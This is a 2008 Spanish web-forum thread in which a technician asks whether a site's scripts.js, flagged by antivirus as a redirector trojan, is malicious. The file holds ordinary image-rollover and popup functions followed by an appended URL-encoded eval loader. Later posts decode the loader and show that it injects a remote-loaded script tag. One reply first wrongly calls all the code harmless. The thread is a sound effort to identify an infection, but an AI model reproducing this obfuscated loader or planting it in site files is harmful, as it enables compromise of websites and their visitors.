Foros del Web » Programando para Internet » Javascript »

es esto un troyano?

Estas en el tema de es esto un troyano? en el foro de Javascript en Foros del Web. Hola, perdón si meto este tema en la seccion q no corresponde pero no tengo ni idea de qué es ni nada. Yo simplemente soy ...
  #1 (permalink)  
Antiguo 14/08/2008, 22:26
 
Fecha de Ingreso: mayo-2006
Ubicación: Ciudad de Buenos Aires
Mensajes: 78
Antigüedad: 17 años, 11 meses
Puntos: 2
es esto un troyano?

Hola, perdón si meto este tema en la seccion q no corresponde pero no tengo ni idea de qué es ni nada.
Yo simplemente soy tecnico, pero un cliente me solicitó que vea por qué razón saltaba siempre el antivirus diciendo q habia un troyano (JS:Redirector-B [Trj] según Avast!) al entrar al sitio, pude ver q estaba en un archivo scripts.js (lo cual no sé q es ni para que sirve), y al abrir con el bloc de notas veo esto:

function MM_preloadImages() { //v3.0

var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();

var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)

if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}

}

function MM_swapImgRestore() { //v3.0

var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;

}

function MM_findObj(n, d) { //v4.01

var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {

d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}

if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];

for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);

if(!x && d.getElementById) x=d.getElementById(n); return x;

}



function MM_swapImage() { //v3.0

var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)

if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}

}

function openCenteredWindow(url, name, width, height, features) {

if(screen.width){

var winl = (screen.width-width)/2;

var wint = (screen.height-height)/2;

} else {

winl = 0;

wint =0;

}

if (winl < 0) winl = 0;

if (wint < 0) wint = 0;

var settings = 'height=' + height + ',';

settings += 'width=' + width + ',';

settings += 'top=' + wint + ',';

settings += 'left=' + winl + ',';

settings += features;

win = window.open(url, name, settings);

win.window.focus();

}

function openNewsPopup(id, context_path) {

openCenteredWindow(context_path + '/popup.php?id=' + id, 'news_popup', 500, 465, 'scrollbars=yes, resizable=no')

}

function popupGaleriaNov( id ) {

openCenteredWindow('../novedades/galeria.php?id=' + id, 'novedades_popup', 435, 400, 'scrollbars=no, resizable=no')

}

function popupRecomendar( id ) {

openCenteredWindow('../recomendar/index.php?id=' + id, 'recomendar_popup', 470, 500, 'scrollbars=yes, resizable=no')

}
/* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65% 6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64 %28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3 D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%37%32%30% 34%36%32%3B%20%4A%53%53%33%20%3D%20%27%2F%5F%61%64 %6D%69%6E%2F%5F%68%74%6D%6C%61%72%65%61%2F%70%6F%7 0%75%70%73%2F%65%6D%6F%71%2F%64%75%6D%6D%79%2E%68% 74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63 %75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%6 5%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73% 2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72 %63%27%2C%20%27%2F%5F%61%64%6D%69%6E%2F%5F%68%74%6 D%6C%61%72%65%61%2F%70%6F%70%75%70%73%2F%65%6D%6F% 71%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E %73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%2 7%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D% 65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79 %54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%6 9%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69% 6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */
Alguien me podría decir si este archivo es necesario por algo (sé q o saben qué web es) pero según su contenido y si solo una parte está "infectada" o todo es "malisioso"? GRACIAS!

perdon por la ignorancia pero sé q aquí me ayudarán como muchas otras veces.

PD: al querer enviar este post con el antivirus activo me salta otra vez, no es mi intención hacer mal, calculo que no lo hará
  #2 (permalink)  
Antiguo 15/08/2008, 08:07
Avatar de derkenuke
Colaborador
 
Fecha de Ingreso: octubre-2003
Ubicación: self.location.href
Mensajes: 2.665
Antigüedad: 20 años, 6 meses
Puntos: 45
Respuesta: es esto un troyano?

Hola inorganico0:

Ese código que has posteado no es malicioso, ni tiene fines malignos. Aunque la última parte (esas letras sin sentido que empiezan por /* y acaban por */) no se sabe a ciencia cierta qué pueden hacer. De todas maneras los caracteres /* y */ comentan líneas, haciendo que esa parte no se procese y es como si no estuviera, así que no es relevante.

Ese código tiene como finalidad abrir unos popups en caso de necesitarlos (para noticias, una galería de imágenes y una sección de recomendar, al parecer). También se encarga de hacer un efecto de cambiar la una imagen cuando se pasa el ratón por encima (rollover).

Puede que el Avast lance un JS:Redirector-B porque considera molestos los popups ¿?, pero no veo redirecciones por ningún lado.

En conclusión: código totalmente normal.

Saludos.
__________________
- Haz preguntas inteligentes, y obtendrás más y mejores respuestas.
- Antes de postearlo Inténtalo y Búscalo.
- Escribe correctamente tus mensajes.
  #3 (permalink)  
Antiguo 15/08/2008, 08:12
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años
Puntos: 839
Respuesta: es esto un troyano?

Al fin he logrado responder .
Hay que tener en cuenta que eval está fuera de los comentarios así que sí se ejecuta, la parte de la redirección yo la he copiado en un archivo a parte y no es el virus, pero después de copiar el eval sí salta el antivirus. De hecho, he buscado información y realmente no solo el avast sino varios otros antivirus lo reconocen como troyano.
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.
  #4 (permalink)  
Antiguo 15/08/2008, 08:47
 
Fecha de Ingreso: mayo-2006
Ubicación: Ciudad de Buenos Aires
Mensajes: 78
Antigüedad: 17 años, 11 meses
Puntos: 2
Respuesta: es esto un troyano?

Hola, gracias por responder, entonces según las 2 respuestas seria conveniente eliminar eso ultimo q arranca desde "/* a0b4df006e02184c60dbf503e71c87ad */", la verdad es que yo no sé manejar este lenguaje así q simplemente les hago caso borrando eso y volviendo a probar.

MUCHAS GRACIAS!
  #5 (permalink)  
Antiguo 15/08/2008, 08:56
Avatar de derkenuke
Colaborador
 
Fecha de Ingreso: octubre-2003
Ubicación: self.location.href
Mensajes: 2.665
Antigüedad: 20 años, 6 meses
Puntos: 45
Respuesta: es esto un troyano?

Ups, vaya, me he dejado de leer esa parte David. Creí que todo el bloque era comentado.

¿Qué podrá ser? No es que esté muy puesto con la seguridad de javascript pero supongo que dependerá sobre qué navegador ejecutemos ese código y sobre qué SO...

Si ponemos document.write( escape("...(toda la ristra)..") ); tendremos algo como esto (escrito en una línea, pero lo idento para leerlo mejor):
Código PHP:
if (!document.getElementById('JSSS')) { 
    
JSS1 59
    
JSS2 2720462
    
JSS3 '/_admin/_htmlarea/popups/emoq/dummy.htm'
    var 
js document.createElement('script'); 
    
js.setAttribute('src''/_admin/_htmlarea/popups/emoq/check.js'); 
    
js.setAttribute('id''JSSS'); 
    
document.getElementsByTagName('head').item(0).appendChild(js); 
}; 
¿Es ilícito para algunos antivirus añadir un elemento script en un documento dinámicamente? Sería bueno concretar qué tiene /_admin/_htmlarea/popups/emoq/check.js, pero entonces el antivirus supongo que diría que lo malicioso está ahí y no en el archivo que nos ocupa.
__________________
- Haz preguntas inteligentes, y obtendrás más y mejores respuestas.
- Antes de postearlo Inténtalo y Búscalo.
- Escribe correctamente tus mensajes.
  #6 (permalink)  
Antiguo 15/08/2008, 09:06
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años
Puntos: 839
Respuesta: es esto un troyano?

Vaya cosa más rara, es realmente extraño que el antivirus salte en esa parte del código, quizás sea un script que se aproveche de algún bug de algún navegador quizás un poco más antiguo y consta en la base de datos de los antivirus .
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 19:48.